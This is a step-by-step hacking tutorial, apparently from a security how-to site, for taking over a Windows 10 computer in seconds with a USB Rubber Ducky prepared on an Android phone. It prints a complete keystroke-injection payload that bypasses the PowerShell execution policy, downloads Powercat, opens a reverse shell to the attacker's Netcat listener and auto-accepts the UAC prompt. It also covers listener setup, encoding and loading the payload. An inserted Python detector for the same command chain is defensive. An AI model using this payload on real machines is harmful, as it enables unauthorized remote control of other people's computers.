With an inconspicuous Android phone and a USB flash drive, an attacker can compromise a Windows 10 computer in less than 15 seconds. Once a root shell has been established, long-term persistence for the backdoor can be configured with just two simple commands, all while bypassing antivirus software and Windows Defender.
How this attack works
Powercat is a full-featured PowerShell module. It works much like Netcat and allows PowerShell users to create TCP and UDP tunnels with simple command-line arguments. A PowerShell payload will be created that downloads, imports and executes Powercat in a single command. That payload is then encoded into a binary format that the USB Rubber Ducky can understand.
Using the USB Rubber Ducky, Powercat is executed in Windows 10 as an administrator, which quickly establishes a root shell back to the attacker's Netcat listener. From there, persistence is configured with schtasks, the command Microsoft provides to automate tasks and commands in Windows 10.
Some hardware is required to perform this hack, as some of you may have already guessed. Below are the four key items.
1. USB Rubber Ducky
The USB Rubber Ducky identifies itself as a keyboard when inserted into a computer and then automatically types the malicious commands that are pre-programmed into its payload. The payload can be adapted to perform a myriad of advanced functions. Prices for the USB Rubber Ducky from Hak5 start at $45.
As an alternative to the USB Rubber Ducky, the NetHunter and DroidDucky projects can turn Android devices into keystroke-injection tools. Unfortunately, they require modifying the Android operating system, which is outside the scope of this article. Both NetHunter and DroidDucky are great projects for those who are willing to modify their phone's operating system. Imagine connecting an Android phone to any computer and having it run complex PowerShell payloads in seconds, with no USB Rubber Ducky required.
2. Android Device with UserLAnd Installed
Any Android phone or tablet that can run the UserLAnd app will be suitable. The device does not need to be rooted. All that is required is internet access via Wi-Fi and the above-mentioned UserLAnd app.
3. OTG Adapter (conditional)
After creating the PowerShell payload (in a later step), it must be moved to the microSD card in the USB Rubber Ducky. Some Android phone and tablet models are equipped with a microSD expansion slot for extra storage, so if you have one of those, you are good to go, because you can transfer the file that way.
If the device does not have a microSD slot, you will need an OTG adapter of some kind, which allows you to connect memory cards to your device via the charging port. An all-in-one solution would be the Monoprice USB-C microSD Reader if your phone has a USB Type-C port. Lexar makes a similar product for Micro-USB ports.
Since the USB Rubber Ducky comes with a microSD-to-USB adapter, you can instead choose an OTG adapter with a female USB Type-A end to plug the microSD adapter into. If you have a USB-C port on your Android device, Aukey makes a good adapter. For Micro-USB ports, there are many inexpensive options, such as Ugreen's cable.
Alternatively, a combination of adapters can get the job done. As you can see below, I use an Aukey adapter together with an Anker portable card reader.
4. Virtual Private Server (Optional)
A virtual private server (VPS) may be required depending on the attack scenario. If a Wi-Fi network is shared with the target device, it is easiest to embed the attacker's local IP address into the payload. In other scenarios, it may be necessary to use a VPS or an Ngrok server.
Step 1: Getting Started with UserLAnd
Before moving forward, check out Distortion's guide on turning an Android phone into a hacking device without root, as well as my "Hack WPA2 Wi-Fi Passwords with Android" guide, because they cover the basics of UserLAnd, the configuration of Kali Linux and Ngrok, and the installation of the software required to follow this article. You must install and configure UserLAnd, create a new file system, and connect to the operating system via SSH with ConnectBot (or JuiceSSH, or the built-in SSH client).
Step 2: Update System & Install Essential Software
As with all Unix-based systems, it is a good idea to make sure the installed packages are fully up to date before continuing with a project. Update the system, install the necessary software, and install Java (needed for the USB Rubber Ducky encoder) with the commands below.
sudo apt-get update && sudo apt-get dist-upgrade
This command can take several minutes to complete, depending on the available internet speed and the Android CPU. Older Android devices take longer to download and decompress packages.
To install the necessary software, use the command below.
sudo apt-get update && sudo apt-get install net-tools netcat gnupg curl wget git nano screen
Java is required to compile the Ducky payload. To install it, use the command below.
sudo apt-get install default-jre-headless
Restart the Android device to ensure that all package updates take effect the next time UserLAnd's Kali OS is started.
Step 3: Starting the Netcat Listener
Depending on the attack scenario, there are several ways to configure the Netcat listener that provides remote access to the target Windows computer.
- Local IP address. If the target computer is on the same Wi-Fi network as the Android device, it is possible to simply launch the Netcat listener in UserLAnd's Kali OS. While private and fast, this method is not ideal. If and when the target disconnects from the shared Wi-Fi network, the Netcat connection will drop, and the device cannot be reached as it moves between different networks.
- Virtual Private Server. A VPS is ideal for remotely hacking targets as they move between different Wi-Fi networks anywhere in the world. In this scenario, the attacker would buy a cheap VPS and SSH into it. Netcat and Screen would be installed for long-term persistence on the hacked Windows computer. This can be set up entirely from Android.
- Ngrok. Remote access with Ngrok has been covered to some extent in "Hack WPA2 Wi-Fi Passwords with Android." In this case, Ngrok would forward requests to the attacker's Android device. Free Ngrok accounts do not allow users to reserve subdomains, so this would only provide persistence until the Ngrok server on the Android device terminates. While it is possible to keep a server running on Android for a long time, it will inevitably end when Android restarts or kills the UserLAnd app in the background.
In any case, it is a good idea to set up Screen so that terminal sessions persist even after the SSH connection is closed. Screen allows users to manage multiple terminal sessions within the same console. Readers are encouraged to learn how to use Screen, as it makes it easy to navigate and "detach" multiple terminal sessions without losing data.
To start a new Screen session, just type screen.
Use the ifconfig -a command to identify the local IP address used by the system. This IP will be required in the next step when creating the payload.
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.0.208  netmask 255.255.255.0  broadcast 192.168.0.255
        inet6 :::::  prefixlen 64  scopeid 0x20<link>
        unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00  txqueuelen 1000  (UNSPEC)
        RX packets 95745  bytes 115985231 (110.6 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 44735  bytes 4289090 (4.0 MiB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0
In UserLAnd's Kali OS there will be many available interfaces. The "wlan0" or "wlan1" interface is the one likely to hold the device's local IP address (192.168.0.208). VPS users will instead embed the same external IP address used when SSHing into the server. Ngrok users must configure a server and embed its URL into the payload.
Finally, start the Netcat listener with the command below.
netcat -vv -l -p 1234
Using port (-p) 1234, Netcat will listen (-l) on all available interfaces. The -vv (very verbose) flag will print the target's IP address in the terminal when a new connection is established.
Step 4: Create the Ducky Payload
After Android restarts, launch the UserLAnd app and SSH into the Kali system. Use nano to create a new "payload.txt" file in the home (~/) directory.
nano ~/payload.txt
Comments (REM) have been added to explain what each line in the payload does.
REM This first delay pauses the Ducky for 5.5 seconds to give the target
REM operating system some time to mount the USB as a keyboard device.
DELAY 5500
REM Opens the Windows Run prompt.
GUI r
REM Delays .7 seconds to give the Run prompt time to open.
DELAY 700
REM Types the PowerShell payload.
STRING powershell /w 1 /C $a=$env:TEMP;Set-ExecutionPolicy Bypass;wget https://cutt.ly/cW13i -o $a\d.ps1;ipmo $a\d.ps1;powercat -c 192.168.0.208 -p 1234 -e powershell
REM Presses Ctrl + Shift + Enter to run PowerShell with administrative permissions.
CTRL-SHIFT ENTER
REM Delays .85 seconds to give the UAC prompt time to open.
DELAY 850
REM Presses Alt + Y to accept the UAC prompt.
ALT y
The PowerShell one-liner does a lot. It consists of several commands chained together and separated by semicolons.
- $a=$env:TEMP – The target's temp directory is stored in the variable $a. This variable is referenced twice later in the script: first as the output directory for powercat.ps1, and again when the file is imported. Using a single-letter variable name helps shorten the total length of the payload. It is more efficient than typing "C:\Users\%USERNAME%\AppData\Local\Temp" several times in the payload.
- Set-ExecutionPolicy Bypass – The execution policy is a security feature of PowerShell that prevents many PowerShell payloads like this one from running. In several tests, I found that simply using -ExecutionPolicy was not enough to bypass this security feature. As an administrator, this policy can be bypassed.
- wget https://cutt.ly/cW13i -o $a\d.ps1 – PowerShell is instructed to make a web request (wget) and download powercat.ps1 via the shortened cutt.ly URL. This URL links directly to the Powercat GitHub page, but it can be changed to the full URL or another shortened URL. Powercat.ps1 is saved (-o) to the temp directory ($a) with the file name "d.ps1". The file name was shortened to a single letter to keep the Ducky payload as short as possible.
- ipmo $a\d.ps1 – PowerShell's Import-Module feature is called with its alias ipmo, again using the shorter version of the command to keep the Ducky payload short. Powercat.ps1 is imported.
- powercat -c 192.168.0.208 -p 1234 -e powershell – Finally, Powercat is run and instructed to connect (-c) to the attacker's server (192.168.0.208) on port (-p) 1234 and execute (-e) PowerShell once the connection is established. This effectively gives the attacker remote access to a root PowerShell terminal.
The REM comments can remain in the payload and do not affect the keystroke injection. To save and exit nano, press Ctrl-X, then Y, then Enter.
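As an added example (not part of the original article), the detection side of the one-liner explained above: a small Python checker that looks for the same staging steps in PowerShell script-block (Event ID 4104) or process-creation (Event ID 4688) records, resolving the $a=$env:TEMP shorthand first so the temp-path indicators still fire. The indicator names, the dictionary shape of the records and the sample records (placeholder URL and host) are constructed for this example.

```python
import re
# Indicator regexes for the pieces of the Powercat one-liner; the names are labels for this example.
INDICATORS = [(name, re.compile(rx, re.I)) for name, rx in [
    ("hidden_window", r"[/-]w(?:indowstyle)?\s+(?:1|hidden)\b"),
    ("execution_policy_bypass",
     r"(?:set-executionpolicy|-e(?:xecutionpolicy|x|p))\s+(?:bypass|unrestricted)\b"),
    ("download_to_temp", r"\b(?:wget|curl|iwr|invoke-webrequest)\b[^;]*\$env:temp"),
    ("import_module_from_temp", r"\b(?:ipmo|import-module)\s+[^;\s]*\$env:temp[^;\s]*\.ps1"),
    ("powercat_reverse_shell", r"\bpowercat\b[^;]*-c\s+\S+[^;]*-e\s+(?:powershell|cmd)\b"),
]]
TEMP_ALIAS = re.compile(r"\$(\w+)\s*=\s*\$env:temp\b", re.I)
# Field carrying the command text: 4104 = script block logging, 4688 = process creation (needs command-line auditing).
TEXT_FIELD = {4104: "ScriptBlockText", 4688: "CommandLine"}

def resolve_temp_aliases(text: str) -> str:
    """Rewrite variables assigned from $env:TEMP (the '$a' trick in the payload)
    to a literal $env:TEMP so the path-based indicators can see the destination."""
    for m in TEMP_ALIAS.finditer(text):
        text = re.sub(r"\$" + re.escape(m.group(1)) + r"\b", "$env:TEMP", text)
    return text

def score_script_block(text: str) -> list:
    """Names of every indicator present in one script block or command line."""
    norm = resolve_temp_aliases(text)
    return [name for name, rx in INDICATORS if rx.search(norm)]

def is_suspicious(hits: list) -> bool:
    """The reverse-shell tool alone, or any two staging steps together, is enough."""
    return "powercat_reverse_shell" in hits or len(hits) >= 2

def scan_events(events: list) -> list:
    """Return (RecordId, hits) for each suspicious record; other event IDs are skipped."""
    flagged = []
    for rec in events:
        field = TEXT_FIELD.get(rec.get("EventID"))
        if field is not None:
            hits = score_script_block(rec.get(field, ""))
            if is_suspicious(hits):
                flagged.append((rec["RecordId"], hits))
    return flagged

# Constructed sample records; the URL and host below are placeholders.
SAMPLE_EVENTS = [
    {"RecordId": 1, "EventID": 4104, "ScriptBlockText":
     "Set-ExecutionPolicy RemoteSigned -Scope CurrentUser; Import-Module ActiveDirectory"},
    {"RecordId": 2, "EventID": 4104, "ScriptBlockText":
     "$a=$env:TEMP;Set-ExecutionPolicy Bypass;wget https://example.invalid/p.ps1 -o $a\\d.ps1;"
     "ipmo $a\\d.ps1;powercat -c 192.0.2.10 -p 1234 -e powershell"},
    {"RecordId": 3, "EventID": 4688, "CommandLine": "powershell /w 1 /C Set-ExecutionPolicy Bypass"},
]
```

The benign admin command in record 1 produces no hits, while the Powercat chain in record 2 trips four indicators and the hidden-window launcher in record 3 trips two.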
Step 5: Encode the Payload
The USB Rubber Ducky payload cannot be loaded onto the microSD card in plain text. Instead, the Hak5 Duck Encoder is used to convert the plain-text payload into a binary format.
To clone the Duck Encoder repository, use the command below.
git clone https://github.com/hak5darren/USB-Rubber-Ducky/
Change (cd) into the newly created Encoder/ directory.
cd USB-Rubber-Ducky/Encoder/
Then encode payload.txt with the command below. This command uses encoder.jar to convert the input (-i) into the required "inject.bin" output (-o) binary. The output file name is not arbitrary; it must be "inject.bin" for the Ducky to perform the keystroke injection.
java -jar encoder.jar -i ~/payload.txt -o inject.bin
Hak5 Duck Encoder 2.6.4
Loading file .....		[ OK ]
Loading keyboard files .....		[ OK ]
Loading language file .....		[ OK ]
Loading DuckyScript .....		[ OK ]
DuckyScript Complete .....		[ OK ]
When it finishes, there will be a new "inject.bin" file in the Encoder/ directory. This can be verified with the ls -l command below.
ls -l
-rw-r--r--. 1 root root  1466 Jan 11 11:39 README
-rw-r--r--. 1 root root 57535 Jan 11 11:39 encoder.jar
-rw-r--r--. 1 root root    86 Jan 12 01:57 inject.bin
drwxr-xr-x. 2 root root  4096 Jan 11 11:39 resources
drwxr-xr-x. 2 root root  4096 Jan 11 11:39 src
Step 6: Connect the Ducky microSD to the Android Device
Using a card reader adapter, the internal microSD slot, or an OTG adapter with a card reader, insert the Ducky's microSD card into the Android device. The microSD card's contents can be viewed using Android's Downloads app.
After a few seconds, a new removable device will appear in the Downloads app. Navigate back to the Kali OS terminal. Kali OS does not have access to external storage devices (i.e., the microSD card), so "inject.bin" must first be copied (cp) to the /sdcard/Download/ directory and then copied to the microSD card using Android itself.
cp ~/USB-Rubber-Ducky/Encoder/inject.bin /sdcard/Download/
And it is now visible in the Downloads app.